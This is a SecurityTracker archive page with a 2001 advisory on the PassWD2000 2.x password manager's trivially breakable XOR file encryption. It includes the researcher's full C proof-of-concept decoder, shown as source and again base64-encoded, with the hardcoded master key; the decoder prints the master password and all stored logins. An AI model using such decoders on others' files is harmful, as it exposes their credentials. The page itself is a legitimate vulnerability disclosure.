SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   PassWD2000 Vendors:   Giordano, Bigarelli
PassWD2000 Password Management Utility May Disclose Passwords to Local Users
SecurityTracker Alert ID:  1001685
SecurityTracker URL:  http://securitytracker.com/id/1001685
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 5 2001
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 2.X, up through 2.8
Description:   A vulnerability has been discovered in PassWD2000 that allows local users to decode password files and obtain password authentication data.

It is reported that PassWD2000 uses a weak encryption scheme that can be readily decoded by a local user.

PassWD2000 apparently stores authentication information, including passwords, in .PEF files. It reportedly uses a simple exclusive-or with a randomly generated 128 bit session key to encrypt the header and data of the PEF file. The sesion key is then exclusive-or'd with a fixed master key and stored in front of the encrypted PEF header.

A demonstration exploit script is included in the Source Message.

The vendor has reportedly been notified and plans to change the password file encryption scheme in an upcoming 3.X release.

Impact:   A local user can decode the password files used by PassWD2000 and obtain user password authentication data.
Solution:   No solution was available at the time of this entry. The vendor reportedly plans to use a different encryption scheme in an upcoming v3.X release.
Vendor URL:  www.passwd2000.com (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  PassWD2000 v2.x Weak Encryption Vulnerability


------------3871AF1D6A7405
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit            


==[ PassWD2000 v2.x Weak Encryption Vulnerability ]===============


              "Success does not consist in never making mistakes
                  but in never making the same one a second time"
                                       --- George Bernard Shaw



Vulnerable:
        PassWD2000 2.0
        PassWD2000 2.1 (*)
        PassWD2000 2.2 (*)
        PassWD2000 2.3 (*)
        PassWD2000 2.4 (*)
        PassWD2000 2.5
        PassWD2000 2.6
        PassWD2000 2.7
        PassWD2000 2.8
         - Microsoft Windows 95
         - Microsoft Windows 98
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000
         - Microsoft Windows ME

        (*): Apparently never made it into a public release.

Not vulnerable:

Vendor:
        Giordano Bigarelli <info@passwd2000.com>
        http://www.passwd2000.com/


--[ Overview ]----------------------------------------------------

 PassWD2000 is a password managment utility designed to store
 login credentials to remote sites, local passwords or
 registration details, or even credit card information.

 Unfortunately, the vendors' understanding of encryption is a bit
 different from mine. PassWD2000 is using an "encryption"
 algorithm that is trivial to break, effectively giving an
 attacker access to all login information stored within
 PassWD2000 once he gains access to the password file.

 PassWD2000 has received the ZDNet Editors' Pick award and other
 share/freeware recommendations, and thus must be considered to
 be in widespread use.



 Think you heard all this before? Definately. Precisely one year
 ago, which is coincidence, I published a similar problem of
 predecessor PassWD v1.2; it used an even weaker "encryption"
 algorithm. For details refer to BID 1300 at:

 http://www.securityfocus.com/bid/1300


--[ Vendor Status ]-----------------------------------------------

 Vendor is informed, and has decided to do nothing about this
 issue. According to vendor, PassWD2000 never claimed so use
 strong encryption, only "quite strong encryption". So there will
 be no fix in versions 2.x. Subsequently, the vendor decided not
 to inform about the issue, neither users nor distribution sites
 of PassWD2000 are going to be informed by the vendor.


--[ Solution ]----------------------------------------------------

 Don't use PassWD2000 2.x, and make sure none of your users or
 admins do either. Period. According to the vendor, the upcoming
 3.x release of PassWD2000 will use Blowfish to protect the data.


--[ Technical Details ]-------------------------------------------

 PassWD2000 stores all login credentials along with the access
 password and a bunch of other things in .PEF files. PEF stands
 for PassWD Encrypted Format.

 Basically it uses a simple exclusive or with a 128 bit key. It
 randomly generates a 128 bit session key, which is used to
 encrypt the header and data of the PEF file. It stores this
 session key xored to a fixed master key in front of the
 encrypted header within the PEF file.

 So what you do is xor the fixed master key with the first 128
 bits of the file to reveal the session key. Then use the session
 key to decrypt the header and data of the file. Only pitfall to
 avoid is that header and data are encrypted seperately (reset
 key offset).


--[ Proof of Concept ]--------------------------------------------

 I've written the decoder for PassWD2000 v2.x PEF files. It has
 grown with my knowledge of the file format, thus is very ugly
 code indeed, and probably unportable (compiles with gcc-2.95.2).
 It should illustrate how to decode a PEF file though.


--[ Afterword ]---------------------------------------------------

 If you copy this text or reuse any part of it, please give due
 credit (and let me know about it).

 Copyright (C) 2001 by Daniel Roethlisberger <daniel@roe.ch>.



A MIME encoded file has been decoded by SecurityTracker for your
convenience:

/*
 *  Decoder for PassWD2000 v2.x password files in PEF format
 *
 *  Written 2001 by Daniel Roethlisberger <daniel@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  This code has grown with my knowledge about the data
 *  format, thus it is quite a bit messy and ugly indeed.
 */

#include <stdio.h>
#include <sys/stat.h>

const unsigned char key[16] = {
	0x0A, 0x0C, 0x4D, 0x1E, 0x01, 0x4F, 0x03, 0x06,
	0x5F, 0x64, 0x96, 0xC8, 0xFA, 0x11, 0x0D, 0x47};

#define leave(x) {\
	fprintf(stderr, "%s: " x "\n", basename(argv[0]));\
	exit(1);\
}
#define leaveheader() {\
	free(buf);\
	leave("header inconsistency");\
}

int main(int argc, char *argv[])
{
	FILE* infile;
	unsigned char *buf;
	struct stat st;
	int buflen;
	int offset, i, count;
	int hdrlen, pwlen, reclen, recnum;

	if(argc != 2)
		leave("only argument must be file to decode");
	
	infile = fopen(argv[1], "r");
	if(!infile)
		leave("cannot open file");

	stat(argv[1], &st);
	buflen = st.st_size;
	buf = (unsigned char*) malloc(buflen);
	if(!buf)
		leave("out of memory");
	fread(buf, 1, buflen, infile);
	fclose(infile);
	printf("[%s]\n", argv[1]);

	if(buflen < 0x1D) /* minimal empty header */
		leaveheader();

	offset = 0;

	/* decode 128bit session key */
	printf("Session key: ");
	for(i = 0; i < 0x10; i++)
	{
		buf[i] ^= key[i];
		printf("%.2X ", buf[i]);
	}
	printf("\n");
	offset += i;

	/* decode header ... */

	/* always seems to be '0' */
	buf[offset] ^= buf[(offset++)%0x10];
	printf("Unknown pre-header byte: %c (should be 0)\n", buf[offset-1]);

	/* header length ... */
	buf[offset] ^= buf[(offset++)%0x10];
	buf[offset] ^= buf[(offset++)%0x10];
	hdrlen = (buf[offset-2] - '0') * 10 + buf[offset-1] - '0';
	printf("Header length: %i\n", hdrlen);

	/* always seems to be '2U00' */
	printf("Unknown header bytes: ");
	for(i = 0; i < 4; i++)
	{
		buf[offset+i] ^= buf[(offset+i)%0x10];
		printf("%c" , buf[offset+i]);
	}
	printf(" (should be 2U00)\n");
	offset += i;
	
	/* password status ... */
	buf[offset] ^= buf[(offset++)%0x10];
	printf("Password protection: %s\n", (buf[offset-1] == '1') ? "enabled" : "disabled");

	/* password ... */
	for(i = 0; i < 2; i++)
		buf[offset+i] ^= buf[(offset+i)%0x10];
	offset += i;
	pwlen = (buf[offset-2] - '0') * 10 + (buf[offset-1] - '0');
	if(pwlen > 30)
		leaveheader();
	printf("Master password: ");
	for(i = 0; i < pwlen; i++)
	{
		buf[offset+i] ^= buf[(offset+i)%0x10];
		printf("%c", buf[offset+i]);
	}
	printf(" (%i)\n", pwlen);
	offset += i;

	/* number of records ... */
	buf[offset] ^= buf[(offset++)%0x10];
	reclen = buf[offset-1] - '0';
	for(i = 0; i < reclen; i++)
		buf[offset+i] ^= buf[(offset+i)%0x10];
	offset += i;
	recnum = 0;
	for(i = reclen; i > 0; --i)
		recnum = (10 * recnum) + buf[offset-i] - '0';
	printf("Number of records: %i\n", recnum);

	/* header checksum ... */
	buf[offset] ^= buf[(offset++)%0x10];
	printf("Header checksum: 0x%.2X\n", buf[offset-1]);

	/* and records. */
	for(i = 0; i < (buflen - offset); i++)
		buf[offset+i] ^= buf[i%0x10];

	if(0x14 + hdrlen != offset)
		printf("Warning: hdrlen mismatch (%i != %i)!\n", hdrlen+0x14, offset);

	if(recnum > 0)
	{
		count = 0;
		printf("Records: [desc - user:pass@URL (date)]\n");
		for(i = 0x14 + hdrlen; i < buflen; i++)
		{
			if(buf[i] == '\r')
				switch((count++)%10)
				{
					case 0: printf(" - "); break;
					case 1: printf(":"); break;
					case 2: printf("@"); break;
					case 3: printf(" ("); break;
					case 4: printf(")"); break;
					case 9:	printf("\n"); break;
				}
			else
				printf("%c", buf[i]);
		}
	}

	free(buf);
	return 0;
}





------------3871AF1D6A7405
Content-Type: application/octet-stream; name="pefdump.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pefdump.c"

Ci8qCiAqICBEZWNvZGVyIGZvciBQYXNzV0QyMDAwIHYyLnggcGFzc3dvcmQgZmlsZXMgaW4gUEVG
IGZvcm1hdAogKgogKiAgV3JpdHRlbiAyMDAxIGJ5IERhbmllbCBSb2V0aGxpc2JlcmdlciA8ZGFu
aWVsQHJvZS5jaD4KICoKICogIFRoaXMgY29kZSBpcyBoZXJlYnkgcGxhY2VkIGluIHRoZSBwdWJs
aWMgZG9tYWluLgogKiAgVXNlIHRoaXMgY29kZSBhdCB5b3VyIG93biByaXNrIGZvciB3aGF0ZXZl
ciB5b3Ugd2FudC4KICoKICogIFRoaXMgY29kZSBoYXMgZ3Jvd24gd2l0aCBteSBrbm93bGVkZ2Ug
YWJvdXQgdGhlIGRhdGEKICogIGZvcm1hdCwgdGh1cyBpdCBpcyBxdWl0ZSBhIGJpdCBtZXNzeSBh
bmQgdWdseSBpbmRlZWQuCiAqLwoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvc3Rh
dC5oPgoKY29uc3QgdW5zaWduZWQgY2hhciBrZXlbMTZdID0gewoJMHgwQSwgMHgwQywgMHg0RCwg
MHgxRSwgMHgwMSwgMHg0RiwgMHgwMywgMHgwNiwKCTB4NUYsIDB4NjQsIDB4OTYsIDB4QzgsIDB4
RkEsIDB4MTEsIDB4MEQsIDB4NDd9OwoKI2RlZmluZSBsZWF2ZSh4KSB7XAoJZnByaW50ZihzdGRl
cnIsICIlczogIiB4ICJcbiIsIGJhc2VuYW1lKGFyZ3ZbMF0pKTtcCglleGl0KDEpO1wKfQojZGVm
aW5lIGxlYXZlaGVhZGVyKCkge1wKCWZyZWUoYnVmKTtcCglsZWF2ZSgiaGVhZGVyIGluY29uc2lz
dGVuY3kiKTtcCn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pCnsKCUZJTEUqIGlu
ZmlsZTsKCXVuc2lnbmVkIGNoYXIgKmJ1ZjsKCXN0cnVjdCBzdGF0IHN0OwoJaW50IGJ1ZmxlbjsK
CWludCBvZmZzZXQsIGksIGNvdW50OwoJaW50IGhkcmxlbiwgcHdsZW4sIHJlY2xlbiwgcmVjbnVt
OwoKCWlmKGFyZ2MgIT0gMikKCQlsZWF2ZSgib25seSBhcmd1bWVudCBtdXN0IGJlIGZpbGUgdG8g
ZGVjb2RlIik7CgkKCWluZmlsZSA9IGZvcGVuKGFyZ3ZbMV0sICJyIik7CglpZighaW5maWxlKQoJ
CWxlYXZlKCJjYW5ub3Qgb3BlbiBmaWxlIik7CgoJc3RhdChhcmd2WzFdLCAmc3QpOwoJYnVmbGVu
ID0gc3Quc3Rfc2l6ZTsKCWJ1ZiA9ICh1bnNpZ25lZCBjaGFyKikgbWFsbG9jKGJ1Zmxlbik7Cglp
ZighYnVmKQoJCWxlYXZlKCJvdXQgb2YgbWVtb3J5Iik7CglmcmVhZChidWYsIDEsIGJ1Zmxlbiwg
aW5maWxlKTsKCWZjbG9zZShpbmZpbGUpOwoJcHJpbnRmKCJbJXNdXG4iLCBhcmd2WzFdKTsKCglp
ZihidWZsZW4gPCAweDFEKSAvKiBtaW5pbWFsIGVtcHR5IGhlYWRlciAqLwoJCWxlYXZlaGVhZGVy
KCk7CgoJb2Zmc2V0ID0gMDsKCgkvKiBkZWNvZGUgMTI4Yml0IHNlc3Npb24ga2V5ICovCglwcmlu
dGYoIlNlc3Npb24ga2V5OiAiKTsKCWZvcihpID0gMDsgaSA8IDB4MTA7IGkrKykKCXsKCQlidWZb
aV0gXj0ga2V5W2ldOwoJCXByaW50ZigiJS4yWCAiLCBidWZbaV0pOwoJfQoJcHJpbnRmKCJcbiIp
OwoJb2Zmc2V0ICs9IGk7CgoJLyogZGVjb2RlIGhlYWRlciAuLi4gKi8KCgkvKiBhbHdheXMgc2Vl
bXMgdG8gYmUgJzAnICovCglidWZbb2Zmc2V0XSBePSBidWZbKG9mZnNldCsrKSUweDEwXTsKCXBy
aW50ZigiVW5rbm93biBwcmUtaGVhZGVyIGJ5dGU6ICVjIChzaG91bGQgYmUgMClcbiIsIGJ1Zltv
ZmZzZXQtMV0pOwoKCS8qIGhlYWRlciBsZW5ndGggLi4uICovCglidWZbb2Zmc2V0XSBePSBidWZb
KG9mZnNldCsrKSUweDEwXTsKCWJ1ZltvZmZzZXRdIF49IGJ1Zlsob2Zmc2V0KyspJTB4MTBdOwoJ
aGRybGVuID0gKGJ1ZltvZmZzZXQtMl0gLSAnMCcpICogMTAgKyBidWZbb2Zmc2V0LTFdIC0gJzAn
OwoJcHJpbnRmKCJIZWFkZXIgbGVuZ3RoOiAlaVxuIiwgaGRybGVuKTsKCgkvKiBhbHdheXMgc2Vl
bXMgdG8gYmUgJzJVMDAnICovCglwcmludGYoIlVua25vd24gaGVhZGVyIGJ5dGVzOiAiKTsKCWZv
cihpID0gMDsgaSA8IDQ7IGkrKykKCXsKCQlidWZbb2Zmc2V0K2ldIF49IGJ1Zlsob2Zmc2V0K2kp
JTB4MTBdOwoJCXByaW50ZigiJWMiICwgYnVmW29mZnNldCtpXSk7Cgl9CglwcmludGYoIiAoc2hv
dWxkIGJlIDJVMDApXG4iKTsKCW9mZnNldCArPSBpOwoJCgkvKiBwYXNzd29yZCBzdGF0dXMgLi4u
ICovCglidWZbb2Zmc2V0XSBePSBidWZbKG9mZnNldCsrKSUweDEwXTsKCXByaW50ZigiUGFzc3dv
cmQgcHJvdGVjdGlvbjogJXNcbiIsIChidWZbb2Zmc2V0LTFdID09ICcxJykgPyAiZW5hYmxlZCIg
OiAiZGlzYWJsZWQiKTsKCgkvKiBwYXNzd29yZCAuLi4gKi8KCWZvcihpID0gMDsgaSA8IDI7IGkr
KykKCQlidWZbb2Zmc2V0K2ldIF49IGJ1Zlsob2Zmc2V0K2kpJTB4MTBdOwoJb2Zmc2V0ICs9IGk7
Cglwd2xlbiA9IChidWZbb2Zmc2V0LTJdIC0gJzAnKSAqIDEwICsgKGJ1ZltvZmZzZXQtMV0gLSAn
MCcpOwoJaWYocHdsZW4gPiAzMCkKCQlsZWF2ZWhlYWRlcigpOwoJcHJpbnRmKCJNYXN0ZXIgcGFz
c3dvcmQ6ICIpOwoJZm9yKGkgPSAwOyBpIDwgcHdsZW47IGkrKykKCXsKCQlidWZbb2Zmc2V0K2ld
IF49IGJ1Zlsob2Zmc2V0K2kpJTB4MTBdOwoJCXByaW50ZigiJWMiLCBidWZbb2Zmc2V0K2ldKTsK
CX0KCXByaW50ZigiICglaSlcbiIsIHB3bGVuKTsKCW9mZnNldCArPSBpOwoKCS8qIG51bWJlciBv
ZiByZWNvcmRzIC4uLiAqLwoJYnVmW29mZnNldF0gXj0gYnVmWyhvZmZzZXQrKyklMHgxMF07Cgly
ZWNsZW4gPSBidWZbb2Zmc2V0LTFdIC0gJzAnOwoJZm9yKGkgPSAwOyBpIDwgcmVjbGVuOyBpKysp
CgkJYnVmW29mZnNldCtpXSBePSBidWZbKG9mZnNldCtpKSUweDEwXTsKCW9mZnNldCArPSBpOwoJ
cmVjbnVtID0gMDsKCWZvcihpID0gcmVjbGVuOyBpID4gMDsgLS1pKQoJCXJlY251bSA9ICgxMCAq
IHJlY251bSkgKyBidWZbb2Zmc2V0LWldIC0gJzAnOwoJcHJpbnRmKCJOdW1iZXIgb2YgcmVjb3Jk
czogJWlcbiIsIHJlY251bSk7CgoJLyogaGVhZGVyIGNoZWNrc3VtIC4uLiAqLwoJYnVmW29mZnNl
dF0gXj0gYnVmWyhvZmZzZXQrKyklMHgxMF07CglwcmludGYoIkhlYWRlciBjaGVja3N1bTogMHgl
LjJYXG4iLCBidWZbb2Zmc2V0LTFdKTsKCgkvKiBhbmQgcmVjb3Jkcy4gKi8KCWZvcihpID0gMDsg
aSA8IChidWZsZW4gLSBvZmZzZXQpOyBpKyspCgkJYnVmW29mZnNldCtpXSBePSBidWZbaSUweDEw
XTsKCglpZigweDE0ICsgaGRybGVuICE9IG9mZnNldCkKCQlwcmludGYoIldhcm5pbmc6IGhkcmxl
biBtaXNtYXRjaCAoJWkgIT0gJWkpIVxuIiwgaGRybGVuKzB4MTQsIG9mZnNldCk7CgoJaWYocmVj
bnVtID4gMCkKCXsKCQljb3VudCA9IDA7CgkJcHJpbnRmKCJSZWNvcmRzOiBbZGVzYyAtIHVzZXI6
cGFzc0BVUkwgKGRhdGUpXVxuIik7CgkJZm9yKGkgPSAweDE0ICsgaGRybGVuOyBpIDwgYnVmbGVu
OyBpKyspCgkJewoJCQlpZihidWZbaV0gPT0gJ1xyJykKCQkJCXN3aXRjaCgoY291bnQrKyklMTAp
CgkJCQl7CgkJCQkJY2FzZSAwOiBwcmludGYoIiAtICIpOyBicmVhazsKCQkJCQljYXNlIDE6IHBy
aW50ZigiOiIpOyBicmVhazsKCQkJCQljYXNlIDI6IHByaW50ZigiQCIpOyBicmVhazsKCQkJCQlj
YXNlIDM6IHByaW50ZigiICgiKTsgYnJlYWs7CgkJCQkJY2FzZSA0OiBwcmludGYoIikiKTsgYnJl
YWs7CgkJCQkJY2FzZSA5OglwcmludGYoIlxuIik7IGJyZWFrOwoJCQkJfQoJCQllbHNlCgkJCQlw
cmludGYoIiVjIiwgYnVmW2ldKTsKCQl9Cgl9CgoJZnJlZShidWYpOwoJcmV0dXJuIDA7Cn0KCg==

------------3871AF1D6A7405--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC